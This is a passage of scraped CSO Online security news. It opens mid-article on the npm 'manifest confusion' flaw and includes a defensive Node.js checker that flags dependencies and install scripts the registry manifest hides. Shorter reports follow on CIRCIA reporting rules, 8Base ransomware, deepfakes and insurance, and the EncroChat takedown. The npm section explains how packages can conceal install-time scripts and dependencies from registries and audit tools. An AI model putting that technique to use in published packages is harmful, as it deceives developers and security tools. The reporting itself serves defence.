According to Clarke, the general assumption in the community is that the manifest published alongside a package on the npm registry matches the contents of the package.json metadata file included inside the package itself, the tarball archive downloaded from the registry. This is not true, and neither client-side package managers such as npm nor security tools that scan packages from the npm registry properly validate the two against each other.

This means a package might have dependencies or installation scripts listed in its package.json file but not in the separate manifest. Clients such as the npm command line interface (CLI) will parse and execute these dependencies and scripts even though they are not listed in the package manifest.

“There are several ways this bug actually impacts consumers/end-users: Cache poisoning (i.e., the package that is saved may not match the name+version spec of that package in the registry/URI), installation of unknown/unlisted dependencies (tricking security/audit tools); execution of unknown/unlisted scripts (tricking security/audit tools); potential downgrade attack (where the version specification saved into projects is for a unspecified, vulnerable version of the package),” Clarke said.

Source-of-truth confusion

At its core, this issue is caused by the fact that there is no single "canonical source of truth" for a package's metadata: name, version, dependencies, scripts, license and more. These are specified in the package.json file inside the package tarball, whose contents are covered by the tarball's integrity hash. However, the same data can also be specified in the manifest submitted when publishing the package to the npm registry, and it is this manifest that dictates the information the registry displays.

For example, Clarke created an example package whose package.json file listed another package as a dependency, but when he published it he did not include the dependency in the manifest. As a result, the package's entry on the npmjs.com registry shows 0 dependencies, because the registry uses the manifest as the canonical source of truth. The registry itself does not validate that the package.json information matches the manifest; that task is left to the client installing the package. As it turns out, the clients do not perform this validation either.

For example, npm version 6 (npm@6), which shipped with the Node.js 14 runtime (long-term support), will execute an install script defined in package.json even if the script is not defined in the manifest. A dependency listed in package.json but missing from the manifest will not be installed the first time the package is downloaded and installed. However, if that package is cached locally and later installed again from the local cache with the --prefer-offline and --no-package-lock command line options, the hidden dependencies from package.json will be installed.

Npm version 9 (npm@9), the current stable version of npm at the time of writing, will similarly install dependencies referenced inside a cached package's package.json when using the --offline config.

The yarn and pnpm package managers that are alternatives to npm are also vulnerable and will execute scripts referenced in the package.json file that are absent from the manifest. Yarn will also prefer the package version defined in package.json over the one in the manifest. Because these two values can be different, it opens the door to a downgrade attack.

Downgrade attacks are dangerous because a package can be replaced with an older version that has a known vulnerability. There’s no shortage of package versions with vulnerabilities, even in the actively maintained projects. Last week researchers from Snyk and Redhunt Labs released the findings of a research project that involved scanning more than 11,000 repositories belonging to the top 1,000 organizations on GitHub. The scan looked for vulnerabilities in the dependencies listed in those projects that spanned multiple programming languages. For JavaScript (npm and yarn), the team extracted 1.9 million dependencies and identified around 550,000 instances of known vulnerabilities in them.

Clarke thinks this issue falls under different vulnerability categories, but at the very least CWE-602 Client-Side Enforcement of Server-Side Security. He notes that “there is a history of relying heavily on the client (aka the npm CLI) to do work that should be done server-side.”

Aside from the aforementioned client-side package managers, the issue also impacts other third-party tools and package registries, including security-focused ones: Snyk, the Chinese npm mirror, the Cloudflare npm CDN mirror, the UNPKG CDN mirror, Skypack, JSPM, and even local repositories created with JFrog's Artifactory.

No easy fix for manifest confusion vulnerability

Fixing this issue by suddenly enforcing validation is not straightforward, and it might take a while until GitHub comes up with a solution, because there are likely many packages that exhibit manifest confusion for non-malicious reasons. Clarke noted that the npm CLI itself causes such inconsistencies. For example, when publishing a package through the npm CLI from a project that contains a binding.gyp file, the client adds a scripts.install entry of "node-gyp rebuild" to the manifest. This entry will not be present in the package.json file.

“GitHub is understandably in a tough spot,” Clarke said. “The fact that npmjs.com has functioned this way for over a decade means that the current state is pretty much codified and likely to break someone in a unique way. As mentioned before, the npm CLI itself relies on this behavior and there are potentially other non-nefarious uses of this in the wild today.”

Users should contact the authors of tools that rely on npm metadata and ask them to use the package.json information rather than the manifest, except for the name and version, which can differ for legitimate reasons. Another option is a proxy between the client and the registry that strictly validates the metadata from both sources for consistency.
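As an added illustration of the consistency check such a proxy or audit tool would need (example code written for this page, not Clarke's proof of concept and not npm's own code), the Node.js script below compares the registry manifest for one package version with the package.json from inside the tarball and reports dependencies and install-time scripts that only the tarball declares. Both inputs are constructed inline with placeholder package names so the script runs offline; in practice the manifest comes from `npm view <name>@<version> --json` and the package.json from `npm pack <name>@<version>` followed by `tar -xOf <name>-<version>.tgz package/package.json`.

```javascript
'use strict';

// Added example: not code from the article, from Darcy Clarke, or from npm.
// Lifecycle scripts the npm CLI runs automatically during install; any of these
// present in the tarball's package.json but absent from the registry manifest
// is the "hidden script" case the article describes.
const INSTALL_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Dependency maps the CLI resolves from package.json.
const DEP_FIELDS = ['dependencies', 'optionalDependencies', 'peerDependencies'];

function asObject(value) {
  return value && typeof value === 'object' && !Array.isArray(value) ? value : {};
}

// Compare the registry's per-version manifest with the package.json from the
// tarball. Returns an array of findings; an empty array means the two agree on
// everything the installer acts on.
function diffManifest(manifest, pkgJson) {
  const findings = [];

  // name and version can differ for legitimate reasons, so these are warnings only.
  for (const field of ['name', 'version']) {
    if (manifest[field] !== pkgJson[field]) {
      findings.push({
        severity: 'warn',
        kind: `${field}-mismatch`,
        detail: `manifest=${manifest[field]} tarball=${pkgJson[field]}`,
      });
    }
  }

  // Dependencies the tarball declares that the manifest hides or alters.
  for (const field of DEP_FIELDS) {
    const inManifest = asObject(manifest[field]);
    const inTarball = asObject(pkgJson[field]);
    for (const [dep, spec] of Object.entries(inTarball)) {
      if (!(dep in inManifest)) {
        findings.push({ severity: 'high', kind: 'hidden-dependency', detail: `${field}: ${dep}@${spec}` });
      } else if (inManifest[dep] !== spec) {
        findings.push({
          severity: 'medium',
          kind: 'dependency-spec-mismatch',
          detail: `${field}: ${dep} manifest=${inManifest[dep]} tarball=${spec}`,
        });
      }
    }
  }

  // Install-time scripts the tarball declares that the manifest hides or alters.
  const manifestScripts = asObject(manifest.scripts);
  const tarballScripts = asObject(pkgJson.scripts);
  for (const name of INSTALL_SCRIPTS) {
    if (!(name in tarballScripts)) continue;
    if (!(name in manifestScripts)) {
      findings.push({ severity: 'high', kind: 'hidden-script', detail: `${name}: ${tarballScripts[name]}` });
    } else if (manifestScripts[name] !== tarballScripts[name]) {
      findings.push({
        severity: 'high',
        kind: 'script-mismatch',
        detail: `${name}: manifest="${manifestScripts[name]}" tarball="${tarballScripts[name]}"`,
      });
    }
  }
  return findings;
}

// True when any finding lets the installer do something the registry page does not show.
function isConfused(findings) {
  return findings.some((f) => f.severity === 'high');
}

// Constructed sample (placeholder package names): the registry advertises zero
// dependencies and no scripts, while the tarball's package.json pulls in a
// dependency and runs a postinstall script.
const sampleManifest = {
  name: 'example-widget', version: '1.2.3', dependencies: {}, scripts: {},
};
const sampleTarballPkgJson = {
  name: 'example-widget',
  version: '1.2.3',
  dependencies: { 'some-unlisted-dep': '^4.0.0' },
  scripts: { postinstall: 'node ./setup.js' },
};

// Run the sample and print a short report; returns 1 when the package should be blocked.
function reportSample() {
  const findings = diffManifest(sampleManifest, sampleTarballPkgJson);
  for (const f of findings) console.log(`[${f.severity}] ${f.kind}: ${f.detail}`);
  return isConfused(findings) ? 1 : 0;
}

reportSample();
```

The script flags only the dangerous direction, data the tarball carries that the manifest omits or alters. The reverse case, such as the manifest `scripts.install` of "node-gyp rebuild" that the CLI adds for packages with a binding.gyp, is expected and is not reported. Name and version mismatches are reported as warnings rather than failures, matching the advice above that those two fields may legitimately differ.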

DevSecOps, Open Source, Vulnerabilities
https://www.csoonline.com/article/644170/npm-ecosystem-vulnerable-to-new-manifest-confusion-attack.html
No consensus on creating a unified US cyber incident reporting framework Thu, 29 Jun 2023 13:44:43 +0000

On the heels of a string of high-profile breaches, in March 2022 US President Joe Biden signed the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA), which mandates that the Cybersecurity and Infrastructure Security Agency (CISA) develop and implement regulations requiring critical infrastructure organizations to report cyber incidents and ransom payments to CISA. The law requires critical infrastructure operators to tell CISA within 72 hours of when a cyber incident has occurred, and to report ransom payments within 24 hours of making them.

In September 2022, CISA issued a wide-ranging request for information (RFI) asking for public feedback on many questions that would feed into its notice of proposed rulemaking (NPRM). CISA plans to issue its NPRM in March 2024. According to press reports, the Cyber Incident Reporting Council established under CIRCIA expects to send to Congress this summer proposed recommendations on developing an incident-reporting framework across crucial agencies and regulatory bodies.

CISA received 131 comments in response to its RFI by the November 14, 2022, deadline. The agency also hosted 30 “listening sessions” with various industry groups from September 2022 through January 2023.

An examination of selected comments submitted to CISA reveals how challenging the task of creating an overarching cyber incident reporting framework will be. The commenters diverged on a host of the central questions posed by CISA, including how to define which entities should be covered, which kinds of cyber incidents should be reported, how soon incidents should be reported, how they should be reported, and how the sensitive reported information should be protected.

The commenters rarely completely agreed on how CISA should proceed, particularly regarding who should be obligated to report. Moreover, many of the commenters advocated narrowing the reporting requirements with exclusions or criteria that would eliminate many cybersecurity incidents. Finally, most commenters recommended aligning CISA’s reporting framework with those developed for specific sectors, which could make CISA’s ultimate framework unwieldy to implement.

The following summary highlights some of the primary threads from the comments submitted in reply to CISA's RFI.

Which entities should be covered?

The commenters varied widely regarding which entities should be covered by the incident reporting rules. Several commenters stressed that CISA should apply size thresholds to weed out smaller entities. For example, the Independent Community Bankers Association said that for the Financial Services Sector, “covered entities” should only include banks with $50 billion or more in assets. The American Water Works Association, representing tens of thousands of primarily small water companies across the US, likewise advocates limiting reports based on size, suggesting a population threshold of customers served starting at 3,300.

Energy provider Exelon offered a more complex approach, saying that the definition of covered entity should be consistent with the definition of critical infrastructure provided in section 2240(5) of the Homeland Security Act and based on:

  • Consequences that disruption to or compromise of the entity could cause to national security, economic security, or public health and safety
  • The likelihood that such an entity may be targeted by a malicious cyber actor, including a foreign country
  • The extent to which damage, disruption, or unauthorized access to such an entity, including the accessing of sensitive cybersecurity vulnerability information or penetration testing tools or techniques, will likely enable the disruption of the reliable operation of critical infrastructure

Several commenters recommended a risk-based approach in determining what constitutes a covered entity. NCTA – The Internet & Television Association said that, consistent with previous policy-based approaches, the "types of entities that constitute covered entities" should be based on risk-based criteria. These criteria include "the consequences that disruption to or compromise of such an entity could cause to national security, economic security, or public health and safety," "the likelihood that a malicious cyber actor may target such an entity," and "the extent to which damage, disruption, or unauthorized access to such an entity . . . will likely enable the disruption of the reliable operation of critical infrastructure."

On the other hand, Microsoft was among the commenters who advocated a more encompassing approach to defining covered entities, saying a risk-based approach is too difficult to implement. The software giant told CISA that "the definition should incorporate existing federal critical infrastructure regulation. The term covered entity should include any entity designated as critical infrastructure by other federal law or authority, including an executive order or presidential policy directive, or is otherwise subject to federal law or regulation as a critical infrastructure operator."

Advocating narrow definitions

To limit the burdens organizations would face if they had to report every minor mishap, many commenters advocated narrow definitions of which incidents to report. NTCA – The Rural Broadband Association argued that covered cyber incidents should include only confirmed incidents that significantly disrupt a provider’s ability to operate core functions and exclude attempts that seek to disrupt them if they don’t rise to that level.

The Municipal Information Systems Association of California (MISAC) said that the definition of a covered incident should be as specific as possible, identifying the criticality or scope of the incident that requires reporting and excluding “external cyber events, natural or man-made, that targets critical infrastructure services including but not limited to DDoS, phishing attempts, provider issues, or natural disaster with no successful infiltration into the agency network, systems, or data.”

Cloudflare argued that any definition of a covered incident should be narrow and specific and encompass only incidents that involve a loss of data, a loss of personally identifiable information (PII), a loss of trade secrets, a financial loss due to degradation, or a substantial disruption of a covered entity’s services.

72-hour cyber incident window with caveats

Although CIRCIA stipulates a 72-hour reporting period, many commenters view that time frame as infeasible. HIMSS Electronic Health Record Association, for example, said that CISA should “provide flexibility for Covered Entities to only include information they have been able to verify in the initial 72-hour report. Requiring all of the elements identified in CIRCIA at 72 hours will not be feasible and would contribute to delays in reporting and divert resources from efforts of the Covered Entity to recover and resume normal operations.”

Like other commenters, NTCA – The Rural Broadband Association argued that the 72-hour window should be considered a minimum time frame. "Cyber incident reports also should not be required until a minimum of 72 hours after a covered entity has confirmed a cyberattack disrupting the provider's core, transport, and/or access networks has occurred. Covered entities need time to investigate and mitigate an intrusion before reporting to the government. This will also result in more effective incident reports as the reporting entities will have a clearer picture of the incident, making CISA better aware of the tactics used to carry out the cyber-attack," NTCA said.

NTCA’s counterpart, NCTA, suggests that the 72-hour clock should not start until the confirmation and containment of an incident as a “substantial incident.” The National Association of Manufacturers suggests that the 72-hour clock should start once a covered entity “reasonably believes” an incident occurs because “the days following discovery of a major cybersecurity incident are often characterized by inconclusive data and mixed presentations of information that require an all-hands-on-deck effort within an enterprise to investigate and respond to the threat.”

Harmonize cyber incident reporting requirements to reduce burdens

The one area of consensus among most of the commenters is that CISA should take great care to align its reporting requirements with those of other regulatory bodies, some of which, such as the Federal Communications Commission (FCC) and the Securities and Exchange Commission (SEC), are still evolving their own rules. Most also point to potential overlap with other governments' reporting requirements, including the European Union's General Data Protection Regulation (GDPR), and with state-level breach reporting requirements.

The National Association of Manufacturers acknowledges the 72-hour reporting deadline is consistent with the GDPR data breach standard, adding that “Any labor-intensive reporting requirements would divert a company’s internal resources from responding to an attack and add unnecessary layer to an already complex situation.”

Several commenters in the power sector point to the already extensive reporting requirements applied to electricity providers, including regimes overseen by the Department of Energy (DOE) and the Federal Energy Regulatory Commission (FERC). The American Public Power Association (APPA), and the Large Public Power Council (LPPC) said, for example, “Given the existing incident reporting regimes overseen by FERC and DOE, CISA should engage in direct and deep consultation with FERC and DOE as it works to implement CIRCIA. Moreover, CISA must take into account existing data breach reporting requirements at the state level. To improve the threat landscape and associated awareness of it, it will be critical to work with existing infrastructures wherever possible to allow single-point reporting with the government being responsible for sharing information internally in a need-to-know environment, rather than imposing multiple reporting obligations on an impacted entity, which may also be dealing with a live cybersecurity event.”

Flexibility and confidentiality for cyber incident report submissions

In terms of how covered entities should submit reports to CISA, the commenters touched on a range of topics, including whether organizations can report through third parties such as information sharing and analysis centers (ISACs), how they receive report submission confirmations, and the degree to which CISA will keep any reports confidential.

The North American Electric Reliability Corporation advised CISA to require covered entities to clearly identify that they are reporting an incident under CIRCIA, as opposed to a voluntary share, and develop an automated mechanism to confirm receipt of a CIRCIA report from a covered entity or a third party on behalf of a covered entity.

The National Rural Electric Cooperative Association said that CISA should be flexible in how reports are submitted, including machine-to-machine and other reporting methods, and asks CISA to use the current structure of the electricity subsector regarding content and submission procedure.

Some commenters expressed concerns over how CISA could keep the reports confidential. NCTA, for example, said, “Much of the information reported to CISA under CIRCIA will be highly confidential and competitively sensitive. To protect such information, CISA should consider treating incident reports as covered either by DHS’s PCII Program or an equivalent program. The PCII Program establishes uniform procedures for the receipt, care, and storage of critical infrastructure information submitted to DHS to protect sensitive data against disclosure through FOIA requests, state and local disclosure laws, use in regulatory proceedings, and use in civil actions.”

Compliance, Ransomware, Regulation
https://www.csoonline.com/article/644155/creating-a-unified-cyber-incident-reporting-framework-will-be-no-easy-feat.html
Perception Point unveils new detection model to tackle generative AI BEC attacks Thu, 29 Jun 2023 13:00:00 +0000

Threat prevention company Perception Point has unveiled a new detection model to counter generative AI-based email threats. The AI-powered technology leverages large language models (LLMs) and a deep learning architecture to detect and prevent business email compromise (BEC) attacks, which are currently undergoing a significant shift due to the rise of generative AI technologies, the vendor said. The method harnesses transformers, AI models capable of understanding the semantic context of text, mirroring the technology behind popular LLMs like OpenAI's ChatGPT and Google's Bard, according to Perception Point.

Malicious actors can use generative AI to enhance their attack toolsets, with email-based social engineering no exception. In January, a study from WithSecure demonstrated how attackers can use generative AI platform ChatGPT to significantly enhance phishing/BEC scams and launch more effective, harder-to-detect campaigns.

Researchers showed that not only can attackers generate unique variations of the same phishing lure with grammatically correct and human-like written text, but they can build entire email chains to make their emails more convincing and can even generate messages using the writing style of real people based on provided samples of their communications. Meanwhile, the Verizon 2023 Data Breach Investigations Report revealed that BEC attacks have almost doubled this year, now accounting for over 50% of incidents involving social engineering.

Method identifies unique patterns in LLM-generated text to detect email threats

The new approach allows Perception Point's solution to identify the unique patterns in LLM-generated text, a key factor in detecting and thwarting generative AI-based threats, the firm said in a press release. The model processes incoming emails in an average of 0.06 seconds, in line with Perception Point's ability to scan content in near real time, it added. It was initially trained on hundreds of thousands of malicious samples caught by Perception Point and is continuously updated with new data to maximize its effectiveness, the vendor claimed.

"There is an urgent need for cutting-edge defenses against generative AI-powered threats," said Tal Zamir, CTO of Perception Point. "We're being challenged as an industry with yet another avenue that bad actors have come to exploit in their ever-expanding range of attacks."

Approach keeps false positives to a minimum via three-phase architecture

The method has also been designed with false positives in mind, Perception Point noted. To minimize false positives resulting from the widespread use of generative AI for crafting legitimate emails, the new method uses a three-phase architecture.

In the first phase, the model assigns a score representing the probability of the content being AI-generated, Perception Point wrote in a blog. Following this, it categorizes the content using advanced Transformers and a refined clustering algorithm. Categories include BEC, spam, and phishing, with a probability score assigned for each. In the final phase, the model integrates insights from the previous steps with additional numeric data, like the sender reputation and authentication protocols information (SPF, DKIM, DMARC). Based on these factors, it predicts if the content is AI-generated, and whether it's malicious, spam, or clean.

Generative AI, Intrusion Detection Software, Threat and Vulnerability Management
https://www.csoonline.com/article/643743/perception-point-unveils-new-detection-model-to-tackle-generative-ai-bec-attacks.html
New ransomware group starts to wreak havoc Thu, 29 Jun 2023 11:41:08 +0000

A massive spike in ransomware activity in May and June 2023 has been attributed to a relatively unknown ransomware group called 8Base. 

"Although the 8Base Ransom Group is not necessarily a new group, their spike in activity recently has not gone unnoticed. Even within the past 30 days, it is within the top 2 performing ransom groups," VMware said in a report. "Not much was known publicly about the kind of ransomware used by 8Base other than the ransom note and that it appends encrypted files with the extension '.8base'."

The group utilizes encryption paired with "name-and-shame" techniques to compel its victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries, VMware said. 

8Base is a ransomware group that has been active since March 2022. The group describes itself as "simple pen testers." Its leak site provides victim details through Frequently Asked Questions and Rules sections, as well as multiple ways to contact the group.

Chart comparing 8Base Ransom Group victimization statistics with other known ransom groups. (Source: VMware)

The group has been linked to 67 attacks as of May 2023, with about half of the victims operating in the business services, manufacturing, and construction sectors. A majority of the targeted companies are located in the US and Brazil, according to statistics gathered by Malwarebytes and NCC Group.

Similarities with RansomHouse

While reviewing 8Base, the researchers noticed there were significant similarities between the 8Base group and another group called RansomHouse. 

"It is up for debate whether RansomHouse is a real ransomware group or not; the group buys already leaked data, partners with data leak sites, and then extorts companies for money," VMware said in its report. 

Comparing the ransom notes of the two groups, the researchers found a 99% linguistic match. The language of the two groups' leak sites was also identical.

"The verbiage is copied word for word from RansomHouse's welcome page to 8Base's welcome page," VMware said.  

The only two major differences between the groups were that RansomHouse advertises its partnerships and is openly recruiting for partners, whereas 8Base does not.

"Given the similarity between the two, we were presented with the question of whether 8Base may be an off-shoot of RansomHouse or a copycat," VMware said, adding that RansomHouse is known for using a wide variety of ransomware that is available on dark markets and doesn't have its own signature ransomware as a basis for comparison. "Interestingly, while researching 8Base we weren't able to find a single ransomware variant either," VMware said. 

Similarities with Phobos Ransomware

While searching for a sample of the ransomware used by the 8Base Ransom Group, researchers recovered a Phobos sample that used a ".8base" file extension on encrypted files. "A comparison of Phobos and the 8Base sample revealed that 8Base was using Phobos version 2.9.1 loaded with SmokeLoader," VMware said.

Phobos ransomware is offered as ransomware-as-a-service, so other threat actors can customize parts of it to their needs, as seen in the 8Base ransom note.

"Although their ransom notes were similar, key differences included Jabber instructions and 'Phobos' in the top and bottom corners of the Phobos ransomware while 8Base has 'cartilage' in the top corner, a purple background, and no Jabber instructions," VMware said. 

VMware warns that 8Base is a highly active group and targets small businesses. "Given the nature of the beast that is 8Base, we can only speculate at this time that they are using several different types of ransomware -- either as earlier variants or as part of their normal operating procedures. What we do know is that this group is highly active and targets smaller businesses," VMware said. 

Cyberattacks, Ransomware
https://www.csoonline.com/article/644134/new-ransomware-group-starts-to-wreak-havoc.html
How the new deepfake reality will impact cyber insurance Thu, 29 Jun 2023 09:00:00 +0000

With the explosion of generative AI programs such as ChatGPT, DALL-E, and Bing, it's becoming easier to create convincing deepfakes that sound, look, move, and express realistically enough to fool business users and customers into falling for new forms of trickery. And the types of deepfakes we're seeing today, such as the fake of Russian President Vladimir Putin declaring martial law over trusted television and radio stations, are only the beginning.

Deepfakes can ruin a company's reputation, bypass biometric controls, phish unsuspecting users into clicking malicious links, and convince financial agents to transfer money to offshore accounts. Attacks leveraging deepfakes can happen over many channels from social media to fake person-to-person video calls over Zoom. Voicemail, Slack channels, email, mobile messaging, and metaverses are all fair game for distributing deepfake scams to businesses and personal users.

Cyber liability insurers are beginning to take notice, and as they do, their security requirements are beginning to adjust to the new 'fake' reality. This includes, but is not limited to, better hygiene across the enterprise, renewed focus on home worker systems, enforced multifactor authentication, out-of-band confirmation to avoid falling for deepfake phishing attempts, user and partner education, and third-party context-based verification services or tools.

Even the diligent can be deepfake-fooled

In early June, two instances of voicemail impersonation were reported to Rob Ferrini, cyber insurance program manager at McGowanPRO, headquartered in Framingham, Massachusetts, with 5,000 cyber-insured clients covered by its insurance partners. 

One led to an open claim under investigation, in which the insured was an accounting firm and an accountant there received a voicemail from one of his business customers to change the instructions for a vendor and make payment on a $77,000 invoice. "The accountant then called their client to verify, and his client reported that he got the same voicemail from their vendor account, so it's probably OK. It ended up that the accountant's client paid a $77,000 invoice to a fraudulent bank account," Ferrini says.

While the accountant did his due diligence and called his client, the client did not do their own diligence and call their vendor to confirm that the voicemail was real. If the insurance investigators cannot claw the money back, the accountant's client may not get reimbursed. Conversely, in that same week, a wealth manager contacted Ferrini to tell him how out-of-band authentication (OOBA) protected his client from falling for an impersonator trying to get him to open a fake mortgage. Before giving any information to the scammer, the client simply called the wealth manager to ask whether the request was genuine, and the wealth manager told him it was fake.

Other layers need to adapt to the deepfake threat

"Many cyber insurance carriers require out-of-band authentication controls to underwrite policies. Out-of-band authentication would mean you call them directly, making sure with two different methods that this person is who they say they are before wiring money to a new account," says Ryan Bell, threat intelligence manager at Corvus, a cyber insurance company based in Boston.

On its security tips page, Corvus provides education on OOBA along with employee awareness, multifactor authentication, email security and logging -- all of which can be applied to deepfake prevention and education. For example, the same prevention recommendations on wire-transfer fraud should apply to social engineering through deepfakes, but preventing deepfake-initiated scams from succeeding may need to be explicitly stated in the insurance policies.

The other issue is how to protect the voice, likeness, interests, and expressions of CEOs and other executives, which can be scraped and fed into a generative AI program to create deepfakes, Bell says. Since it's impossible to keep these people off the web, organizations will need to tune their dark web and external threat intelligence to look for precursors to deepfake creation.

Will insurers require new deepfake detection tools or services?

Employee awareness training will only go so far as deepfakes get more realistic and interactive with AI-generated images, trained facial expressions, and manipulated voices. Take, for example, work-from-home deepfake interviewees, which the FBI's Internet Crime Complaint Center (IC3) started warning about in 2022. At some point, it becomes impossible for the HR person to identify the fake, so deepfake detection and verification tools will become an important part of the employer's arsenal.

"There are programs that can detect if a person is live or fake by way of blood flow, movements, background, and more criteria, taking a recorded or live image down to the pixel level. These services look for signs of fakes that are largely undetectable at the human level," says Geoff Kohl, a senior director at the Security Industry Association (SIA) who authored a paper on the impact of deepfakes on cybersecurity programs that includes interviews with SIA members. "Today's emerging deepfake detection solutions are largely delivered as standalone software, but for these offerings to scale and become available to businesses everywhere, it is inevitable that these software solutions will be offered as cloud-based services."

Work is underway on open-source standards to assist viewers and security tools in verifying the authenticity of an image. Microsoft's Video Authenticator was built and tested on data sets prior to its release in 2020, and Microsoft concedes that the model will not hold up to advances in generative AI. And, since 2021, policy groups have been talking about contextualization engines to determine the realness of online media including images and voice, and companies like Google are announcing new tools to detect fakes in image search results. A handful of API and browser-based plugins are also emerging to detect the 'aliveness' of videos in social media.

And while these tools may serve media companies and social media users, they seem to neglect the key channels where deepfakes can impact business, government, and critical infrastructure agencies, such as over voicemail, e-mail, Zoom, Slack, or other common business communication channels. Based on their lack of readiness for generative AI at the April 2023 RSA Security Conference, don't expect traditional security vendors to fill this space any time soon. So, a new breed of cloud-based detection and inspection services will likely emerge to serve enterprises in the future.

What's in your policy about deepfakes?

For the most part, organizations will need to focus on requirements that are in their cyber insurance policies. Since most policies call for multifactor authentication as a prerequisite for granting coverage, Ferrini of McGowanPRO suggests that business users need to strengthen these capabilities across their organizations. So, if deepfakes are used to thwart biometric access controls, a second form of authentication would help protect against unauthorized access.

Wendy Esposito, the lead of the GenAI Commission at Benesch Law, an AmLaw 200 firm with offices in the US and China, advises CISOs to review their cyber liability policies regularly, even quarterly or semi-annually if possible. "Organizations should be looking at their policies now to understand what is and is not covered, because technology and cyber threats are changing so quickly. CISOs should pick up that document regularly and hold discussions with risk, legal, and finance teams to measure current and future risks against potential gaps in coverage. At least annually, boards of directors need to be briefed on the organization's cyber liability coverage and any identified gaps."

Take reputational damage coverage, for example. If financial losses are caused through deepfakes posted on social media, podcasts, YouTube, or network television or radio (such as in the case with Russia's president), then current policies likely won't cover them because they weren't caused by a breach of the company's network or systems, she adds.

Esposito has seen many policies on behalf of her clients, and they only cover such losses if they were caused by network penetration or a cyberattack. Conversely, if the attackers use deepfakes to phish an employee and then install ransomware on company systems, then under certain policies that would probably be covered because it involves an intrusion -- so long as the proper email security controls and user training programs are actively in place (and those programs will need to be deepfake aware). It's through this lens that CISOs and insurers will need to reexamine existing policy requirements and their technical controls. Esposito predicts that deepfake-related losses will be added to cyber insurance policies, but at additional cost to the insured, adding that "cyber liability insurance is very expensive and deepfake coverage will likely add to that expense."

Cybercrime, Data and Information Security, Insurance Industry, IT Leadership
https://www.csoonline.com/article/643895/how-the-new-deepfake-reality-will-impact-cyber-insurance.html
Encrochat bust leads to 6,500 arrests, seizure of $1B in assets Wed, 28 Jun 2023 19:40:07 +0000

In one of the biggest law enforcement operations against encrypted communications, authorities around the world have arrested 6,558 people and seized $985 million (EUR900 million) in illicit proceeds in the takedown of encrypted phone network EncroChat.

A joint investigation -- initiated by French and Dutch authorities -- intercepted and analyzed over 115 million conversations that took place over the encrypted messaging platform among more than 60,000 users, Europol announced on Tuesday.

"The successful takedown of EncroChat followed the efforts of a joint investigation team (JIT) set up by both countries in 2020, supported by Eurojust and Europol. Since then, close to EUR 900 million in criminal funds have been seized or frozen," Europol said in a press release. Eurojust is an EU agency that coordinates law enforcement actions among member states.

Based on accumulated figures from all authorities involved, three years after EncroChat's encryption was broken by law enforcement, 6,558 individuals have been arrested, including 197 high-value targets. Seizures also include 30.5 million pills of chemical drugs, 103.5 tons of cocaine, 163.4 tons of cannabis, 971 vehicles, 271 estates or homes, 923 weapons, and 40 airplanes.

Takedown of EncroChat

EncroChat was an encrypted messaging platform that was increasingly being used by organized crime groups. The French Gendarmerie and judicial authorities had been investigating phones that used the secure communication tool since 2017. The authorities discovered that the phones were regularly found in operations against organized crime groups and that the company was operating from servers in France.

"Eventually, it was possible to put a technical device in place to go beyond the encryption technique and have access to the users' correspondence," Europol and Eurojust said in a joint statement.

In early 2020, EncroChat was one of the largest providers of encrypted digital communications, with a very high share of users presumably engaged in criminal activity, the authorities said. "User hotspots were particularly present in source and destination countries for cocaine and cannabis trade, as well as in money laundering centers," according to the joint statement.

The French authorities decided to open a case with Eurojust in the Netherlands in 2019. Data related to the case was first shared with the Netherlands.

In France, where the operation took place under the code name "Emma 95," the Gendarmerie set up a task force in March 2020 with more than 60 officers. In the Netherlands, the operation went under the code name "Lemont," and hundreds of investigators -- with authorization of the examining magistrate -- constantly followed the communications of thousands of individuals in order to analyze and act on the intercepted data stream.

The interception of EncroChat messages came to an end on June 13, 2020, when the company realized that a public authority had penetrated the platform. "EncroChat then sent a warning to all its users with the advice to immediately throw away the phones," Europol said.

EncroChat operations

EncroChat phones were advertised as guaranteeing perfect anonymity, with no traceability to users. "It also had functions intended to ensure the automatic deletion of messages and a specific PIN code to delete all data on the device. This would allow users to quickly erase compromising messages, for example at the time of arrest by the police," Europol said.

In addition, the devices could be erased remotely by the reseller or a help desk. "EncroChat also sold crypto for around $1,100 (EUR 1,000) each, on an international scale. It also offered subscriptions with worldwide coverage, at a cost of $1,640 (1,500 EUR) for a six-month period, with 24/7 support," Europol said.

The use of encrypted communications by organized crime groups has been on the radar of law enforcement authorities around the world. In March 2021, Sky ECC, another encrypted communication platform, was dismantled in a joint operation by judicial and law enforcement authorities in Belgium, France, and the Netherlands. Many users of EncroChat had moved to the Sky ECC platform once EncroChat was dismantled.

In the same year, the US Federal Bureau of Investigation (FBI) and Australian Federal Police (AFP) ran an encrypted chat service called ANoM for nearly three years to intercept 27 million messages exchanged between criminal gang members globally. As a result of that operation, 800 arrests were made across 118 countries. Europol called it the "biggest ever law enforcement operation against encrypted communication."

Communications Security, Cybercrime
https://www.csoonline.com/article/643888/encrochat-bust-leads-to-6500-arrests-seizure-of-1b-in-assets.html
Attack surface visibility a top CISO priority amid growing attacks: Report Wed, 28 Jun 2023 18:03:15 +0000

Ninety-three percent of organizations suffered a cyberattack last year, making attack surface visibility a top priority for CISOs, according to a study by threat intelligence company Censys.

The study was designed to explore the state of security leadership in a shifting digital terrain and interviewed a total of 208 CISOs or CISO equivalents from US-based companies with more than 5,000 employees.

In the report, Censys explored the cybersecurity events and experiences that influence senior leadership decisions, said Dayna Rothman, chief marketing officer at Censys. "By doing this study, it is our hope that organizations can better facilitate conversations about the importance of digital asset management and maintain good security practices that provide continued visibility," Rothman said.

Incidents fuel the push for attack surface visibility

All participants in the study agreed that their view of the current risk environment is more negative than it was a year ago. This was mainly because a significant number (93%) of them experienced at least one cyberattack in the past year, according to the study.

"Nearly three-fourths of those surveyed in recent EMA research had experienced a cybersecurity incident in the past 12-18 months," said Chris Steffen, an analyst at Enterprise Management Associates. "That number will always vary depending on what they consider an incident, but no matter how you look at it, the enterprise is forced to address these kinds of issues, either from a proactive prevention perspective or a remediation -- 'dealing with the consequences' perspective."

While the latest tools and technologies help CISOs cope with daily cybersecurity vulnerabilities, these advances in technology are also benefiting cybercriminals, Steffen added.

More than half (53%) of the respondents identified the "need to secure their organization's entire attack surface" as their top priority, emphasizing external attack surface management solutions as critical elements to securing organizations and preventing attacks.

